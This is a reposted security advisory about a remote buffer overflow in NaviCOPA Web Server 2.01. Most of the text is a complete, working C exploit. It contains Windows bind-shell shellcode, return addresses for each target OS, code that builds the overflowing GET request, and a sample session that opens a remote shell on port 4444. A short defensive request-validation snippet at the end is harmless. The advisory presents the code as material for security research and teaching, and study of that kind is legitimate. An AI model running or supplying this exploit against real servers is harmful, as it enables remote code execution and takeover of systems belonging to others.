[Repost] NaviCOPA Web Server Remote Buffer Overflow Vulnerability

Source: NSFOCUS (绿盟科技)

NaviCOPA Web Server Remote Buffer Overflow Vulnerability

Published: 2006-09-27
Updated: 2006-09-30

Affected systems:
InterVations NaviCOPA Web Server 2.01
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20250

NaviCOPA Web Server is a web server that runs on Windows and can configure HTTP access automatically.

NaviCOPA Web Server contains a buffer overflow in its handling of overlong requests. A remote attacker can trigger the overflow by sending an overlong request to the server, leading to execution of arbitrary code.

<* Source: h07 (h07@interia.pl) *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear the risk themselves!

/*
navi_exp.c
NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
Coded by h07 <h07@interia.pl>
Tested on XP SP2 Polish, 2000 SP4 Polish
Example:

C:\>navi_exp 192.168.0.1 0

[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit
[*] Coded by h07 <h07@interia.pl>
[+] Sending buffer: OK
[*] Check your shell on 192.168.0.1:4444
[*] Press enter to quit

C:\>nc -v 192.168.0.1 4444
[192.168.0.1] 4444 (?) open
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\windows\system32>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#define PORT 80
#define BUFF_SIZE 1024

/* one entry per supported target: OS name and the return address used for it */
typedef struct
{
    char os_name[32];
    unsigned long ret;
} target;


char shellcode[] =

/*
Win32_bind shellcode
Encoder: PexFnstenvMov
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f
Thx metasploit.com
*/

"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06"
"\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\xf9\xec\x6e\xda"
"\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\xe9\x98\xde\xa2"
"\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\xc6\x8a\x3d\x3e"
"\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x22\x3b\xe4\x5f"
"\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x07\xf8\x92\x96"
"\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x36\x98\xd1\xb6"
"\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\xea\x43\x6e\x6c"
"\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\xf9\xc3\xf9\x71"
"\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x0e\x11\xc4\xd0"
"\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x55\x40\xc2\xe9"
"\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x8f\xf2\x04\xd2"
"\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\xd6\x7b\x35\x17"
"\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x80\x5a\xc6\x45"
"\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x7f\x44\x6e\x6c"
"\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x6c\x43\xc8\x93"
"\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x44\x3e\x6f\xf8"
"\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x10\xec\xe4\xfe"
"\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x53\x42\x6e\x6a"
"\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\xf9\xc3\x1a\xed"
"\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x02\x4c\xc2\x45"
"\xd0\xec\x41\xba\x06\x13";

char buffer[BUFF_SIZE];

target list[] =
{
    "XP SP2 Polish",
    0x7d168877, //JMP ESP

    "XP SP2 English",
    0x7ca58265, //JMP ESP

    "XP SP2 German",
    0x7cb4d5ac, //JMP ESP

    "2000 SP4 Polish",
    0x77596433, //JMP ESP

    "2000 SP4 English",
    0x78326433  //JMP ESP
};

int main(int argc, char *argv[])
{
    WSADATA wsa;
    int sock, os, r_len, i,
        a = (sizeof(list) / sizeof(target)) - 1;   /* index of the last target */
    unsigned long eip;
    struct hostent *he;
    struct sockaddr_in client;

    printf("\n[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n");
    printf("[*] Coded by h07 <h07@interia.pl>\n");

    if(argc < 3)
    {
        printf("[*] Usage: %s <host> <system>\n", argv[0]);
        printf("[*] Sample: %s 192.168.0.1 0\n", argv[0]);
        printf("[*] Systems..\n");
        for(i = 0; i <= a; i++)
            printf("[>] %d: %s\n", i, list[i].os_name);
        return 1;
    }

    WSAStartup(MAKEWORD(2, 0), &wsa);

    os = atoi(argv[2]);   /* target index chosen on the command line */

    if((os < 0) || (os > a))
    {
        printf("[-] Error: unknown target %d\n", os);
        return -1;
    }

    eip = list[os].ret;

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if((he = gethostbyname(argv[1])) == NULL)
    {
        printf("[-] Unable to resolve\n");
        return -1;
    }

    client.sin_addr = *((struct in_addr *)he->h_addr);
    client.sin_port = htons(PORT);
    client.sin_family = AF_INET;

    if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
    {
        printf("[-] Error: connect()\n");
        return -1;
    }

    r_len = 234;
    memset(buffer, 0x41, r_len);
    memcpy(buffer, "GET ", 4);
    *((unsigned long*)(&buffer[r_len])) = eip;
    memset(buffer + (r_len + 4), 0x90, 32);
    strcat(buffer, shellcode);
    strcat(buffer, " HTTP/1.1\r\n\r\n\x00");

    //buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1\r\n\r\n\x00"]

    if(send(sock, buffer, strlen(buffer), 0) != -1)
    {
        printf("[+] Sending buffer: OK\n");
        printf("[*] Check your shell on %s:4444\n", argv[1]);
    }
    else
        printf("[-] Sending buffer: failed\n");

    printf("[*] Press enter to quit\n");
    getchar();

    return 0;
}

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

InterVations
------------
The vendor has not yet released a patch or upgrade. We recommend that users of this software keep an eye on the vendor's home page for the latest version:

http://www.navicopa.com/
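As an added illustration, not part of the advisory or of h07's code: a request-line check that a front-end filter or a hardened server could apply to the overlong GET described above. It flags a request-target that exceeds an assumed cap (MAX_TARGET, 255 bytes; the advisory names no safe length) or that carries non-printable bytes, and exercises itself against a constructed request with the same layout as the exploit's payload, using placeholder bytes where the exploit carries a return address and shellcode.

```c
#include <stddef.h>
#include <string.h>

#define MAX_TARGET 255   /* assumed cap; the advisory names no safe length */

enum verdict { REQ_OK = 0, REQ_TOO_LONG, REQ_BINARY, REQ_MALFORMED };

/* Inspect the first line of a raw HTTP request (len bytes, NULs allowed).
 * Flags a request-target that carries non-printable bytes or exceeds
 * MAX_TARGET; *target_len (optional) receives the bytes examined. */
enum verdict check_request_line(const unsigned char *req, size_t len, size_t *target_len)
{
    size_t i = 0, start, n;
    /* Skip the method token ("GET", "POST", ...); a space must follow it. */
    while (i < len && req[i] != ' ' && req[i] != '\r' && req[i] != '\n') i++;
    if (i == len || req[i] != ' ') return REQ_MALFORMED;
    start = ++i;
    /* Walk the request-target up to the next space or end of line. */
    for (; i < len && req[i] != ' ' && req[i] != '\r' && req[i] != '\n'; i++) {
        if (req[i] < 0x21 || req[i] > 0x7e) {   /* control, NUL or high byte */
            if (target_len) *target_len = i - start;
            return REQ_BINARY;
        }
    }
    n = i - start;
    if (target_len) *target_len = n;
    return n > MAX_TARGET ? REQ_TOO_LONG : REQ_OK;
}

/* Constructed sample with the layout the exploit comment describes
 * ("GET " + 230 filler bytes + RET + 32 NOPs + shellcode + " HTTP/1.1"),
 * with 0xff/0xcc placeholders where the exploit carries an address and code;
 * with_payload == 0 builds a same-length but all-printable target instead. */
enum verdict check_sample(int with_payload, size_t *target_len)
{
    unsigned char req[512];
    size_t pos = 0;
    memcpy(req + pos, "GET ", 4);  pos += 4;
    memset(req + pos, 'A', 230);   pos += 230;  /* filler up to the saved return address */
    if (with_payload) {
        memset(req + pos, 0xff, 4);  pos += 4;   /* return-address placeholder */
        memset(req + pos, 0x90, 32); pos += 32;  /* NOP sled */
        memset(req + pos, 0xcc, 16); pos += 16;  /* shellcode placeholder */
    } else {
        memset(req + pos, 'A', 52);  pos += 52;  /* no binary bytes, only length */
    }
    memcpy(req + pos, " HTTP/1.1\r\n\r\n", 13); pos += 13;
    return check_request_line(req, pos, target_len);
}
```

The payload-shaped request is rejected at its first non-printable byte (the return address placeholder at offset 230 of the target), and the all-printable variant is rejected on length alone, so a server that had enforced either check would not have copied the overflow into its fixed buffer.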